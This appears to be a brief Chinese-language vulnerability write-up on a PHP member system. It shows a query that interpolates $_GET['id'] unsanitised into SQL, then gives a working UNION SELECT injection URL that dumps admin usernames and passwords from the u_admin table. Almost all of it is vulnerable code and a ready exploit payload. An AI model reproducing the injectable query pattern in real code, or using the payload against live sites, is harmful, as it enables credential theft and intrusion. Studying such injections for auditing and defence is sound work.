if (isset($_GET['id'])) {
$sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
$res = $pdo->query($sql);
list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}
很明显的GET型注入 爆管理员密码的payload:
http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23